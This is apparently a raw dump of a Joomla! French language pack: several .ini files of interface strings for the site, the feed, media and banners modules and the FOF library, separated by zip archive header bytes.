JFIELD_ALIAS_DESC="L'Alias sera utilisé dans les URL SEF. Laissez vide pour que Joomla! génère la valeur depuis le titre de l'article. Cette valeur va dépendre des paramètres SEO (Configuration Globale ->Site). <br />Utiliser Unicode créera des alias UTF-8. Vous pouvez également saisir tout caractère UTF-8. Les espaces et certains caractères interdits seront remplacés par des traits d'union. <br />Lorsque vous utilisez la translittération par défaut, l'alias sera en minuscules et avec des tirets au lieu d'espaces. Vous pouvez créer l'alias vous-même, en minuscules et avec traits d'union (-). Aucun espace ni trait de soulignement n'est autorisé. La valeur par défaut sera la date et l'heure si le titre est en caractères non-latins."
JFIELD_ALIAS_LABEL="Alias"
JFIELD_ALIAS_PLACEHOLDER="Auto-génération à partir du titre"
JFIELD_ALT_PAGE_TITLE_LABEL="Titre alternatif de page"
JFIELD_CATEGORY_DESC="Catégorie"
JFIELD_FIELDS_CATEGORY_DESC="Sélectionner la catégorie à laquelle est assignée ce champ."
JFIELD_LANGUAGE_DESC="Assigner une langue à cet article."
JFIELD_LANGUAGE_LABEL="Langue"
JFIELD_META_DESCRIPTION_DESC="La métadonnée 'description' permet d'indexer une description du contenu de la page afin d'améliorer son référencement (~250 caractères).<br />Lorsque le contenu est indexé par un moteur dans les résultats d'une recherche, le texte de cette métadonnée est affiché sous le titre."
JFIELD_META_DESCRIPTION_LABEL="Méta Description"
JFIELD_META_KEYWORDS_DESC="La métadonnée 'keywords' permet d'indexer une série de mots clés ou d'expressions (séparés par une virgule) liés au thème du contenu."
JFIELD_META_KEYWORDS_LABEL="Mots-clés"
JFIELD_META_RIGHTS_DESC="Décrivez les droits qu'ont les autres utilisateurs d'accéder à ce contenu."
JFIELD_META_RIGHTS_LABEL="Droits d'accès au contenu"
JFIELD_ORDERING_DESC="Tri des articles dans la catégorie"
JFIELD_ORDERING_LABEL="Trier"
JFIELD_PUBLISHED_DESC="Déterminer le statut de publication"
JFIELD_TITLE_DESC="Titre de l'article"

JGLOBAL_ADD_CUSTOM_CATEGORY="Ajouter une nouvelle catégorie"
JGLOBAL_ARTICLES="Articles"
JGLOBAL_FIELDS="Champs"
JGLOBAL_AUTH_ACCESS_DENIED="Accès refusé"
JGLOBAL_AUTH_ACCESS_GRANTED="Accès autorisé"
JGLOBAL_AUTH_BIND_FAILED="Impossible de se lier au serveur LDAP"
JGLOBAL_AUTH_CANCEL="Authentification annulée"
JGLOBAL_AUTH_CURL_NOT_INSTALLED="Curl n'est pas installé"
JGLOBAL_AUTH_EMPTY_PASS_NOT_ALLOWED="Vous devez indiquer un mot de passe!"
JGLOBAL_AUTH_FAIL="Authentification échouée"
JGLOBAL_AUTH_FAILED="Échec de l'authentification : %s"
JGLOBAL_AUTH_INCORRECT="Identifiant et/ou Mot de passe incorrect"
JGLOBAL_AUTH_INVALID_PASS="Le nom d'utilisateur ne correspond pas au mot de passe, ou vous n'avez pas encore de compte."
JGLOBAL_AUTH_INVALID_SECRETKEY="La clé secrète d'authentification en deux étapes n'est pas valide."
; The following 2 strings are deprecated and will be removed with 4.0.
JGLOBAL_AUTH_NO_BIND="Impossible de se lier au serveur LDAP"
JGLOBAL_AUTH_NO_CONNECT="Impossible de se connecter au serveur LDAP"
JGLOBAL_AUTH_NO_REDIRECT="Impossible de rediriger vers le serveur : %s"
JGLOBAL_AUTH_NO_USER="Le nom d'utilisateur ne correspond pas au mot de passe, ou vous n'avez pas encore de compte."
JGLOBAL_AUTH_NOT_CONNECT="Impossible de se connecter au service d'authentification."
JGLOBAL_AUTH_NOT_CREATE_DIR="Impossible de créer le répertoire de stockage %s. Veuillez vérifier les permissions."
JGLOBAL_AUTH_PASS_BLANK="LDAP n'accepte pas les mots de passe vides"
JGLOBAL_AUTH_UNKNOWN_ACCESS_DENIED="Résultat inconnu. Accès refusé"
JGLOBAL_AUTH_USER_BLACKLISTED="L'utilisateur est en liste noire"
JGLOBAL_AUTH_USER_NOT_FOUND="Impossible de trouver l'utilisateur"
JGLOBAL_AUTO="Automatique"
JGLOBAL_CATEGORY_NOT_FOUND="Catégorie introuvable"
JGLOBAL_CENTER="Centre"
JGLOBAL_CHECK_ALL="Tout cocher"
JGLOBAL_CLICK_TO_SORT_THIS_COLUMN="Cliquez pour trier cette colonne"
JGLOBAL_COLLAPSE_CATEGORIES="Afficher moins de catégories"
JGLOBAL_CREATED_DATE_ON="Créé le %s"
JGLOBAL_CUSTOM_CATEGORY="Nouvelles catégories"
JGLOBAL_DESCRIPTION="Description"
JGLOBAL_DISPLAY_NUM="Affichage #"
JGLOBAL_EDIT="Modifier"
JGLOBAL_EDIT_TITLE="Modifier l'article"
JGLOBAL_EMAIL="E-mail"
JGLOBAL_EMAIL_DOMAIN_NOT_ALLOWED="Le domaine de mail <strong>%s</strong> n'est pas autorisé. Merci de choisir une autre adresse mail."
JGLOBAL_EMAIL_TITLE="Envoyer ce lien à un ami"
JGLOBAL_EXPAND_CATEGORIES="Afficher plus de catégories"
JGLOBAL_FIELD_ADD="Ajouter"
JGLOBAL_FIELD_CATEGORIES_CHOOSE_CATEGORY_DESC="Sélectionnez la catégorie parente des sous-catégories à afficher."
JGLOBAL_FIELD_CATEGORIES_CHOOSE_CATEGORY_LABEL="Catégorie principale"
JGLOBAL_FIELD_CATEGORIES_DESC_DESC="Saisissez du texte dans ce champ pour remplacer la description d'origine de la catégorie principale."
JGLOBAL_FIELD_CATEGORIES_DESC_LABEL="Description alternative"
JGLOBAL_FIELD_CREATED_BY_ALIAS_DESC="Afficher un autre nom que celui de l'auteur"
JGLOBAL_FIELD_CREATED_BY_ALIAS_LABEL="Alias de l'auteur"
JGLOBAL_FIELD_CREATED_BY_DESC="Auteur de l'article."
JGLOBAL_FIELD_CREATED_BY_LABEL="Créé par"
JGLOBAL_FIELD_CREATED_DESC="Date de création de l'élément."
JGLOBAL_FIELD_CREATED_LABEL="Date de création"
JGLOBAL_FIELD_FEATURED_DESC="Assigner l'article à la page blog des articles en vedette"
JGLOBAL_FIELD_FEATURED_LABEL="En vedette"
JGLOBAL_FIELD_FIELD_CACHETIME_DESC="Durée en minutes entre deux actualisation du cache."
JGLOBAL_FIELD_FIELD_ORDERING_DESC="Ordre d'affichage des éléments"
JGLOBAL_FIELD_FIELD_ORDERING_LABEL="Ordre"
JGLOBAL_FIELD_GROUPS="Groupes de champs"
JGLOBAL_FIELD_ID_DESC="Numéro d'enregistrement (identification) dans la base de données."
JGLOBAL_FIELD_ID_LABEL="Id"
JGLOBAL_FIELD_LAYOUT_DESC="Choisissez dans la liste déroulante la mise en page à appliquer."
JGLOBAL_FIELD_LAYOUT_LABEL="Mise en page"
JGLOBAL_FIELD_MODIFIED_LABEL="Date de modification"
JGLOBAL_FIELD_MODIFIED_BY_DESC="L'utilisateur qui a effectué la dernière modification de l'article."
JGLOBAL_FIELD_MODIFIED_BY_LABEL="Modifié par"
JGLOBAL_FIELD_MOVE="Déplacer"
JGLOBAL_FIELD_NUM_CATEGORY_ITEMS_DESC="Nombre de catégories à afficher pour chaque niveau."
JGLOBAL_FIELD_NUM_CATEGORY_ITEMS_LABEL="Nombre de catégories"
JGLOBAL_FIELD_PUBLISH_DOWN_DESC="Date optionnelle pour cesser la publication"
JGLOBAL_FIELD_PUBLISH_DOWN_LABEL="Fin de publication"
JGLOBAL_FIELD_PUBLISH_UP_DESC="Date optionnelle pour débuter la publication"
JGLOBAL_FIELD_PUBLISH_UP_LABEL="Début de publication"
JGLOBAL_FIELD_REMOVE="Supprimer"
JGLOBAL_FIELD_SHOW_BASE_DESCRIPTION_DESC="Afficher la description de la catégorie principale ou, alternativement, remplacer avec le texte du champ de description de l'élément de menu.<br />Si vous utilisez la catégorie racine comme principale, vous devez lui donner une description."
JGLOBAL_FIELD_SHOW_BASE_DESCRIPTION_LABEL="Description de la catégorie du niveau supérieur"
JGLOBAL_FIELD_VERSION_NOTE_DESC="Saisir une note optionnelle pour cette version."
JGLOBAL_FIELD_VERSION_NOTE_LABEL="Note de version"
JGLOBAL_FILTER_BUTTON="Filtre"
JGLOBAL_FILTER_LABEL="Filtre"
JGLOBAL_FULL_TEXT="Texte complet"
JGLOBAL_GT="&gt;"
; The following string is deprecated and will be removed with 4.0.
JGLOBAL_HELPREFRESH_BUTTON="Rafraîchir"
JGLOBAL_HITS="Clics"
JGLOBAL_HITS_ASC="Clics ascendant"
JGLOBAL_HITS_COUNT="Clics : %s"
JGLOBAL_HITS_DESC="Clics descendant"
JGLOBAL_ICON_SEP="|"
JGLOBAL_INHERIT="Hériter"
JGLOBAL_INTRO_TEXT="Texte d'introduction"
JGLOBAL_KEEP_TYPING="Continuez la saisie..."
JGLOBAL_LEFT="Gauche"
JGLOBAL_LIST_ALIAS="(<span>Alias</span>: %s)"
JGLOBAL_LIST_ALIAS_NOTE="(<span>Alias</span>: %s, <span>Note</span>: %s)"
JGLOBAL_LOOKING_FOR="Recherche de"
JGLOBAL_LT="&lt;"
JGLOBAL_MAXIMUM_UPLOAD_SIZE_LIMIT="Taille maximum de téléchargement&nbsp;: <strong>%s</strong>"
JGLOBAL_NEWITEMSLAST_DESC="Les nouveaux éléments sont placés par défaut en dernière position. Vous pourrez modifier leur ordre après avoir sauvegardé l'article."
JGLOBAL_NO_MATCHING_RESULTS="Aucun résultat correspondant "
JGLOBAL_NUM="Nombre"
JGLOBAL_OTPMETHOD_NONE="Désactiver l'authentification en deux étapes"
JGLOBAL_PASSWORD="Mot de passe"
JGLOBAL_PASSWORD_RESET_REQUIRED="Vous devez réinitialiser votre mot de passe avant de continuer."
JGLOBAL_PREVIEW_POSITION="<span>Position&nbsp;:</span> %s"
JGLOBAL_PREVIEW_STYLE="<span>Style&nbsp;:</span> %s"
JGLOBAL_PRINT="Imprimer"
JGLOBAL_PRINT_TITLE="Imprimer l'article < %s >"
JGLOBAL_RECORD_NUMBER="ID d'enregistrement : %d "
JGLOBAL_REMEMBER_ME="Se souvenir de moi"
JGLOBAL_REMEMBER_MUST_LOGIN="Par raison de sécurité, vous devez vous connecter avant de modifier vos informations personnelles."
JGLOBAL_RESOURCE_NOT_FOUND="Ressource non trouvée"
JGLOBAL_RIGHT="Droite"
JGLOBAL_ROOT="Racine"
JGLOBAL_SECRETKEY="Clé secrète"
JGLOBAL_SECRETKEY_HELP="Si vous avez activé l'authentification en deux étapes dans votre compte d'utilisateur, merci de saisir votre clé secrète. Si vous ne comprenez pas ce dont il s'agit, vous pouvez laisser le champ vide."
JGLOBAL_SELECT_AN_OPTION="Sélectionnez une option"
JGLOBAL_SELECT_NO_RESULTS_MATCH="Aucun résultat correspondant"
JGLOBAL_SELECT_SOME_OPTIONS="Sélectionnez certaines options"
JGLOBAL_SORT_BY="Tri des tables par&nbsp;:"
JGLOBAL_START_PUBLISH_AFTER_FINISH="La date de début de publication doit être fixée avant la date de fin de publication."
JGLOBAL_SUBCATEGORIES="Sous-catégories"
JGLOBAL_SUBHEADING_DESC="Texte facultatif à afficher en sous-titre."
JGLOBAL_TITLE="Titre"
JGLOBAL_TITLE_ASC="Titre ascendant"
JGLOBAL_TITLE_DESC="Titre descendant"
JGLOBAL_TYPE_OR_SELECT_CATEGORY="Taper ou sélectionner une catégorie"
JGLOBAL_TYPE_OR_SELECT_SOME_OPTIONS="Saisir ou choisir des options"
JGLOBAL_TYPE_OR_SELECT_SOME_TAGS="Saisir ou sélectionner certains tags"
JGLOBAL_USE_GLOBAL="Utiliser les paramètres généraux"
JGLOBAL_USE_GLOBAL_VALUE="Valeur globale (%s)"
JGLOBAL_USERNAME="Identifiant"
JGLOBAL_VALIDATION_FORM_FAILED="Formulaire invalide"
JGLOBAL_YOU_MUST_LOGIN_FIRST="Veuillez d'abord vous identifier"

JGRID_HEADING_ACCESS="Accès"
JGRID_HEADING_ACCESS_ASC="Accès ascendant"
JGRID_HEADING_ACCESS_DESC="Accès descendant"
JGRID_HEADING_ID="Id"
JGRID_HEADING_ID_ASC="ID ascendant"
JGRID_HEADING_ID_DESC="ID descendant"
JGRID_HEADING_LANGUAGE="Langue"
JGRID_HEADING_LANGUAGE_ASC="Langue ascendant"
JGRID_HEADING_LANGUAGE_DESC="Langue descendant"
JGRID_HEADING_ORDERING_ASC="Ordre ascendant"
JGRID_HEADING_ORDERING_DESC="Ordre descendant"

; if there is an error connecting database before initialisation, en-GB.lib_joomla.ini can't be loaded
; we therefore have to load the strings from en-GB.ini

JLIB_DATABASE_ERROR_ADAPTER_MYSQL="L'adaptateur MySQL 'mysql' n'est pas disponible."
JLIB_DATABASE_ERROR_ADAPTER_MYSQLI="L'adaptateur MySQL 'mysqli' n'est pas disponible."
JLIB_DATABASE_ERROR_CONNECT_DATABASE="Impossible de se connecter à la base : %s"
JLIB_DATABASE_ERROR_CONNECT_MYSQL="Connexion à MySQL impossible."
JLIB_DATABASE_ERROR_DATABASE_CONNECT="Impossible de se connecter à la base"
JLIB_DATABASE_ERROR_LOAD_DATABASE_DRIVER="Impossible de charger le driver de base : %s"
JLIB_ERROR_INFINITE_LOOP="Boucle infinie détectée par JError"

JOPTION_DO_NOT_USE="- Pas de sélection -"
JOPTION_SELECT_ACCESS="- Sélectionner l'Accès -"
JOPTION_SELECT_AUTHOR="- Sélectionner l'auteur -"
JOPTION_SELECT_CATEGORY="- Sélectionner la Catégorie -"
JOPTION_SELECT_LANGUAGE="- Sélectionner la Langue -"
JOPTION_SELECT_PUBLISHED="- Sélectionner l'état -"
JOPTION_SELECT_MAX_LEVELS="- Sélectionner niveaux maximum -"
JOPTION_SELECT_MONTH="- Sélectionner un mois -"
JOPTION_SELECT_TAG="Sélectionner Tag -"
JOPTION_USE_DEFAULT="- Valeur par Défaut -"

JSEARCH_FILTER_CLEAR="Effacer"
JSEARCH_FILTER_LABEL="Filtre"
JSEARCH_FILTER_SUBMIT="Rechercher"
JSEARCH_FILTER="Recherche"

DATE_FORMAT_LC="l j F Y"
DATE_FORMAT_LC1="l j F Y"
DATE_FORMAT_LC2="l j F Y H:i"
DATE_FORMAT_LC3="j F Y"
DATE_FORMAT_LC4="j/m/y"
DATE_FORMAT_LC5="Y-m-d H:i"
DATE_FORMAT_LC6="d-m-Y H:i:s"
DATE_FORMAT_JS1="j/m/y"
DATE_FORMAT_CALENDAR_DATE="%d-%m-%Y"
DATE_FORMAT_CALENDAR_DATETIME="%d-%m-%Y %H:%M:%S"
DATE_FORMAT_FILTER_DATE="d-m-Y"
DATE_FORMAT_FILTER_DATETIME="d-m-Y H:i:s"

; Months

JANUARY_SHORT="Jan"
JANUARY="janvier"
FEBRUARY_SHORT="Fév"
FEBRUARY="février"
MARCH_SHORT="Mar"
MARCH="mars"
APRIL_SHORT="Avr"
APRIL="avril"
MAY_SHORT="Mai"
MAY="mai"
JUNE_SHORT="Jui"
JUNE="juin"
JULY_SHORT="Juil"
JULY="juillet"
AUGUST_SHORT="Aoû"
AUGUST="août"
SEPTEMBER_SHORT="Sep"
SEPTEMBER="septembre"
OCTOBER_SHORT="Oct"
OCTOBER="octobre"
NOVEMBER_SHORT="Nov"
NOVEMBER="novembre"
DECEMBER_SHORT="Déc"
DECEMBER="décembre"

;Days of the Week
SAT="Sam"
SATURDAY="samedi"
SUN="Dim"
SUNDAY="dimanche"
MON="Lun"
MONDAY="lundi"
TUE="Mar"
TUESDAY="mardi"
WED="Mer"
WEDNESDAY="mercredi"
THU="Jeu"
THURSDAY="jeudi"
FRI="Ven"
FRIDAY="vendredi"

; Localised number format

DECIMALS_SEPARATOR=","
THOUSANDS_SEPARATOR=" "

; Time Zones - this data has been removed as it is no longer used by Joomla 3.x

PHPMAILER_PROVIDE_ADDRESS="Vous devez saisir au moins une adresse de destinataire."
PHPMAILER_MAILER_IS_NOT_SUPPORTED="Le gestionnaire de mail n'est pas disponible."
PHPMAILER_EXECUTE="Ne peut être exécuté :"
PHPMAILER_EXTENSION_MISSING="Extension manquante : "
PHPMAILER_INSTANTIATE="Ne peut lancer la fonction mail."
PHPMAILER_AUTHENTICATE="Erreur SMTP ! Authentification impossible."
PHPMAILER_FROM_FAILED="L'adresse d'expédition suivante a renvoyé une erreur :"
PHPMAILER_RECIPIENTS_FAILED="Erreur SMTP ! Les adresses des destinataires suivants ont renvoyé une erreur :"
PHPMAILER_DATA_NOT_ACCEPTED="Erreur SMTP ! Données non acceptées."
PHPMAILER_CONNECT_HOST="Erreur ! Connexion à l'hôte SMTP impossible."
PHPMAILER_FILE_ACCESS="Impossible d'accéder au fichier :"
PHPMAILER_FILE_OPEN="Erreur fichier : Impossible d'ouvrir le fichier :"
PHPMAILER_ENCODING="Encodage inconnu :"
PHPMAILER_SIGNING_ERROR="Erreur de signature :"
PHPMAILER_SMTP_ERROR="Erreur de serveur SMTP:"
PHPMAILER_EMPTY_MESSAGE="Corps du message vide"
PHPMAILER_INVALID_ADDRESS="Adresse invalide"
PHPMAILER_VARIABLE_SET="Impossible d'initialiser ou de réinitialiser la variable: "
PHPMAILER_SMTP_CONNECT_FAILED="Impossible de connecter par SMTP"
PHPMAILER_TLS="Impossible de lancer TLS"

; Database types (allows for a more descriptive label than the internal name)
MYSQL="MySQL"
MYSQLI="MySQLi"
ORACLE="Oracle"
PGSQL="PostgreSQL (PDO)"
PDOMYSQL="MySQL (PDO)"
POSTGRESQL="PostgreSQL"
SQLAZURE="Microsoft SQL Azure"
SQLITE="SQLite"
SQLSRV="Microsoft SQL Server"

; Search tools
JSEARCH_TOOLS="Outils de recherche"
JSEARCH_TOOLS_DESC="Filtrer les éléments listés"
JSEARCH_TOOLS_ORDERING="Ordonner par&nbsp;:"
PK!��_�<	<	fr-FR/fr-FR.mod_feed.ininu&1i�; @date        2015-10-22
; @author      Joomla! Project
; @copyright   (C) 2005 - 2020 Open Source Matters. All rights reserved.
; @copyright   (C) 2005 - 2020 Open Source Matters. All rights reserved.
; @license     GNU General Public License version 2 or later; see LICENSE.txt
; @note        Complete
; @note        Client Site
; @note        All ini files need to be saved as UTF-8


MOD_FEED="Fil d'actualité RSS/RDF/ATOM"
MOD_FEED_ERR_CACHE="Veuillez ouvrir le dossier du cache en écriture !"
MOD_FEED_ERR_FEED_NOT_RETRIEVED="Fil d'actualité introuvable"
MOD_FEED_ERR_NO_URL="Aucune URL fournie pour le fil d'actualité !"
MOD_FEED_FIELD_DATE_DESC="Afficher la date de publication du fil d'actualité."
MOD_FEED_FIELD_DATE_LABEL="Date du fil d'actualité"
MOD_FEED_FIELD_DESCRIPTION_DESC="Activer/Désactiver l'affichage du texte de description du fil d'actualité."
MOD_FEED_FIELD_DESCRIPTION_LABEL="Description du fil"
MOD_FEED_FIELD_IMAGE_DESC="Activer/Désactiver l'affichage de l'image relative à l'ensemble du fil d'actualité."
MOD_FEED_FIELD_IMAGE_LABEL="Image du fil"
MOD_FEED_FIELD_ITEMDATE_DESC="Afficher la date de publication de fils d'actualité individuels."
MOD_FEED_FIELD_ITEMDATE_LABEL="Date de publication"
MOD_FEED_FIELD_ITEMDESCRIPTION_DESC="Activer/Désactiver l'affichage du texte d'introduction des éléments du fil d'actualité."
MOD_FEED_FIELD_ITEMDESCRIPTION_LABEL="Introduction"
MOD_FEED_FIELD_ITEMS_DESC="Spécifiez par une valeur numérique le nombre d'éléments à afficher pour ce fil d'actualité."
MOD_FEED_FIELD_ITEMS_LABEL="Nombre d'éléments"
MOD_FEED_FIELD_RSSTITLE_DESC="Activer/Désactiver l'affichage du titre du fil d'actualité."
MOD_FEED_FIELD_RSSTITLE_LABEL="Titre"
MOD_FEED_FIELD_RSSURL_DESC="Veuillez spécifier l'URL du fil d'actualité RSS, RDF ou ATOM."
MOD_FEED_FIELD_RSSURL_LABEL="URL du fil"
MOD_FEED_FIELD_RTL_DESC="Afficher les textes du fil d'actualité dans le sens RTL (de droite à gauche)."
MOD_FEED_FIELD_RTL_LABEL="Écriture de droite à gauche"
MOD_FEED_FIELD_WORDCOUNT_DESC="Vous pouvez limiter la longueur du texte d'introduction des éléments du fil en spécifiant une valeur numérique. La valeur '0' affiche tout le texte."
MOD_FEED_FIELD_WORDCOUNT_LABEL="Nombre de mots"
MOD_FEED_XML_DESCRIPTION="Le module 'mod_feed' affiche les articles d'un fil d'actualité RSS, RDF ou ATOM."
PK!����fr-FR/fr-FR.com_media.ininu&1i�; @date        2015-07-20
; @author      Joomla! Project
; @copyright   (C) 2005 - 2020 Open Source Matters. All rights reserved.
; @copyright   (C) 2005 - 2020 Joomla.fr [Traduction]
; @license     GNU General Public License version 2 or later; see LICENSE.txt
; @note        Complete
; @note        Client Site
; @note        All ini files need to be saved as UTF-8


COM_MEDIA_ALIGN="Alignement"
COM_MEDIA_ALIGN_DESC="L'alignement sera défini par les classes 'pull-left', 'pull-center' ou 'pull-right' appliquées aux éléments '<figure>' ou '<img>'."
COM_MEDIA_BROWSE_FILES="Rechercher les fichiers"
COM_MEDIA_CAPTION="Légende"
COM_MEDIA_CAPTION_CLASS_LABEL="Classe de la légende"
COM_MEDIA_CAPTION_CLASS_DESC="La classe saisie sera appliquée à l'élément '<figcaption>'. Par exemple :'text-left', 'text-right', 'text-center'"
COM_MEDIA_CLEAR_LIST="Vider la Liste"
COM_MEDIA_CONFIGURATION="Médias : paramètres"
COM_MEDIA_CREATE_FOLDER="Créer un dossier"
COM_MEDIA_CURRENT_PROGRESS="Progression"
COM_MEDIA_DESCFTP="Pour charger, changer et supprimer les fichiers médias, Joomla! aura besoin des informations de votre compte FTP. Veuillez les saisir dans les champs ci-dessous."
COM_MEDIA_DESCFTPTITLE="Détails du compte FTP"
COM_MEDIA_DETAIL_VIEW="Détails"
COM_MEDIA_DIRECTORY="Répertoire"
COM_MEDIA_DIRECTORY_UP="Répertoire supérieur"
COM_MEDIA_ERROR_BAD_REQUEST="Requête incorrecte"
COM_MEDIA_ERROR_FILE_EXISTS="Le fichier existe déjà"
COM_MEDIA_ERROR_UNABLE_TO_CREATE_FOLDER_WARNDIRNAME="Impossible de créer le répertoire. Le nom du répertoire ne doit contenir que des caractères alphanumériques et pas d'espace."
COM_MEDIA_ERROR_UNABLE_TO_BROWSE_FOLDER_WARNDIRNAME="Impossible d'ouvrir:&#160;%s. Le nom du répertoire ne doit contenir que des caractères alphanumériques et pas d'espace."
COM_MEDIA_ERROR_UNABLE_TO_DELETE="Impossible de supprimer :&#160"
COM_MEDIA_ERROR_UNABLE_TO_DELETE_FILE_WARNFILENAME="Impossible de supprimer :&#160%s. Le nom du fichier ne doit contenir que des caractères alphanumériques et aucun espace."
COM_MEDIA_ERROR_UNABLE_TO_DELETE_FOLDER_NOT_EMPTY="Impossible de supprimer :&#160%s. Le dossier n'est pas vide!"
COM_MEDIA_ERROR_UNABLE_TO_DELETE_FOLDER_WARNDIRNAME="Impossible de supprimer :&#160%s. Le nom du dossier ne doit contenir que des caractères alphanumériques et pas d'espace."
COM_MEDIA_ERROR_UNABLE_TO_UPLOAD_FILE="Impossible d'enregistrer le fichier."
COM_MEDIA_ERROR_WARNFILETOOLARGE="Ce fichier est trop gros."
COM_MEDIA_ERROR_WARNUPLOADTOOLARGE="La taille totale du téléchargement excède la limite."
COM_MEDIA_FIELD_CHECK_MIME_DESC="Utiliser MIME Magic ou Fileinfo pour essayer de vérifier les fichiers. Essayez de désactiver si vous avez des erreurs de type mime invalides."
COM_MEDIA_FIELD_CHECK_MIME_LABEL="Vérifier les types MIME"
COM_MEDIA_FIELD_IGNORED_EXTENSIONS_DESC="Extensions de fichiers ignorées pour la vérification des types MIME et les envois restreints"
COM_MEDIA_FIELD_IGNORED_EXTENSIONS_LABEL="Extensions ignorées"
COM_MEDIA_FIELD_ILLEGAL_MIME_TYPES_DESC="Une liste, séparée par des virgules, de types MIME interdits au chargement (liste noire)"
COM_MEDIA_FIELD_ILLEGAL_MIME_TYPES_LABEL="Types MIME illégaux"
COM_MEDIA_FIELD_LEGAL_EXTENSIONS_DESC=" Extensions (types de fichiers) dont le transfert est autorisé (séparées par des virgules)."
COM_MEDIA_FIELD_LEGAL_EXTENSIONS_LABEL="Extensions autorisées (Types de fichiers)"
COM_MEDIA_FIELD_LEGAL_IMAGE_EXTENSIONS_DESC="Types d'Image (types de fichiers) dont le transfert est autorisé (séparés par des virgules). Utilisé pour valider les en-têtes d'images."
COM_MEDIA_FIELD_LEGAL_IMAGE_EXTENSIONS_LABEL="Image autorisées (Types de fichiers)"
COM_MEDIA_FIELD_LEGAL_MIME_TYPES_DESC="Une liste de types MIME autorisées au chargement, séparés par des virgules"
COM_MEDIA_FIELD_LEGAL_MIME_TYPES_LABEL="Types MIME autorisés"
COM_MEDIA_FIELD_MAXIMUM_SIZE_DESC="Taille maximale de fichier autorisé d'envoi (en mégaoctets).<br />Note : votre serveur possède sa propre limite."
COM_MEDIA_FIELD_MAXIMUM_SIZE_LABEL="Taille Maximale (en MB)"
COM_MEDIA_FIELD_PATH_FILE_FOLDER_DESC="Saisissez ici le chemin vers le dossier des fichiers, par rapport à la racine"
COM_MEDIA_FIELD_PATH_FILE_FOLDER_LABEL="Chemin vers le dossier des fichiers"
COM_MEDIA_FIELD_PATH_IMAGE_FOLDER_DESC="Saisissez ici le chemin vers le dossier des images, par rapport à la racine."
COM_MEDIA_FIELD_PATH_IMAGE_FOLDER_LABEL="Chemin vers le dossier des images"
COM_MEDIA_FIELD_RESTRICT_UPLOADS_DESC="Restreindre le chargement aux images pour les utilisateurs de statut inférieur à Gestionnaire, si Fileinfo ou MIME Magic ne sont pas installés."
COM_MEDIA_FIELD_RESTRICT_UPLOADS_LABEL="Restreindre les chargements"
COM_MEDIA_FILES="Fichiers"
COM_MEDIA_FILESIZE="Taille des fichiers"
COM_MEDIA_FOLDER="Dossier"
COM_MEDIA_FOLDERS="Dossiers"
COM_MEDIA_IMAGE_DESCRIPTION="Description de l'Image"
COM_MEDIA_IMAGE_URL="URL de l'Image"
COM_MEDIA_INSERT="Insérer"
COM_MEDIA_INSERT_IMAGE="Insérer une Image"
COM_MEDIA_MAXIMUM_SIZE="Taille maximale"
COM_MEDIA_MEDIA="Média"
COM_MEDIA_NAME="Nom de l'Image"
COM_MEDIA_NO_IMAGES_FOUND="Aucune Image trouvée"
COM_MEDIA_NOT_SET="Non défini"
COM_MEDIA_OVERALL_PROGRESS="Progression"
COM_MEDIA_PIXEL_DIMENSIONS="Dimensions en Pixel (L x H)"
COM_MEDIA_START_UPLOAD="Transférer"
COM_MEDIA_THUMBNAIL_VIEW="Vignette"
COM_MEDIA_TITLE="Titre de l'Image"
COM_MEDIA_UP="Au-dessus"
COM_MEDIA_UPLOAD="Chargement"
; The following two strings are deprecated with 3.7.0 and will be removed in 4.0
COM_MEDIA_UPLOAD_FILES="Transfert de fichiers (taille maximale: %s Mo)"
COM_MEDIA_UPLOAD_FILES_NOLIMIT="Transfert de fichier (pas de taille maximale)"
COM_MEDIA_UPLOAD_COMPLETE="Chargement terminé"
COM_MEDIA_UPLOAD_FILE="Chargement des fichiers"
COM_MEDIA_UPLOAD_SUCCESSFUL="Chargement réussi"
PK!d�����fr-FR/fr-FR.lib_fof.sys.ininu&1i�; @date        2015-10-22
; @author      Joomla! Project
; @copyright   (C) 2005 - 2020 Open Source Matters. All rights reserved.
; @copyright   (C) 2005 - 2020 Joomla.fr [Traduction]
; @license     GNU General Public License version 2 or later; see LICENSE.txt
; @note        Complete
; @note        Client Site
; @note        All ini files need to be saved as UTF-8


LIB_FOF_XML_DESCRIPTION="Framework-on-Framework (FOF) - Une plateforme de développement rapide de composants pour Joomla!"
PK!{��dBBfr-FR/fr-FR.mod_banners.ininu&1i�; @date        2015-01-30
; @author      Joomla! Project
; @copyright   (C) 2005 - 2020 Open Source Matters. All rights reserved.
; @copyright   (C) 2005 - 2020 Joomla.fr [Traduction]
; @license     GNU General Public License version 2 or later; see LICENSE.txt
; @note        Complete
; @note        Client Site
; @note        All ini files need to be saved as UTF-8


COM_BANNERS_NO_CLIENT="- Pas de client -"
MOD_BANNERS="Bannières"
MOD_BANNERS_BANNER="Bannière"
MOD_BANNERS_FIELD_BANNERCLIENT_DESC="Vous pouvez spécifier un client pour n'afficher que ses bannières."
MOD_BANNERS_FIELD_BANNERCLIENT_LABEL="Client"
MOD_BANNERS_FIELD_CACHETIME_DESC="Durée avant de remettre en cache"
MOD_BANNERS_FIELD_CACHETIME_LABEL="Durée du Cache"
MOD_BANNERS_FIELD_CATEGORY_DESC="Sélectionnez une ou plusieurs catégorie desquelles afficher les bannières.<br />Si aucune sélection n'est faite, les bannières de toutes les catégories seront utilisées."
MOD_BANNERS_FIELD_COUNT_DESC="Nombre de bannières à afficher."
MOD_BANNERS_FIELD_COUNT_LABEL="Nombre"
MOD_BANNERS_FIELD_FOOTER_DESC="Texte à afficher après le groupe de bannières. Vous pouvez utiliser les balises HTML."
MOD_BANNERS_FIELD_FOOTER_LABEL="Texte de pied de page"
MOD_BANNERS_FIELD_HEADER_DESC="Texte à afficher avant le groupe de bannières. Vous pouvez utiliser les balises HTML."
MOD_BANNERS_FIELD_HEADER_LABEL="Texte d'en-tête"
MOD_BANNERS_FIELD_RANDOMISE_DESC="Sélectionnez l'ordre d'affichage des bannières."
MOD_BANNERS_FIELD_RANDOMISE_LABEL="Ordre d'affichage"
MOD_BANNERS_FIELD_TAG_DESC="La bannière est sélectionnée selon la correspondance de ses mots clés avec ceux du document courant."
MOD_BANNERS_FIELD_TAG_LABEL="Sélection selon mots clés"
MOD_BANNERS_FIELD_TARGET_DESC="Fenêtre cible lorsque l'on clique sur le lien"
MOD_BANNERS_FIELD_TARGET_LABEL="Cible"
MOD_BANNERS_VALUE_STICKYORDERING="Épinglé, trié"
MOD_BANNERS_VALUE_STICKYRANDOMISE="Épinglé, aléatoire"
MOD_BANNERS_XML_DESCRIPTION="Le module 'mod_banners' affiche les bannières liées aux 'clients' définis dans le composant de gestion des bannières."
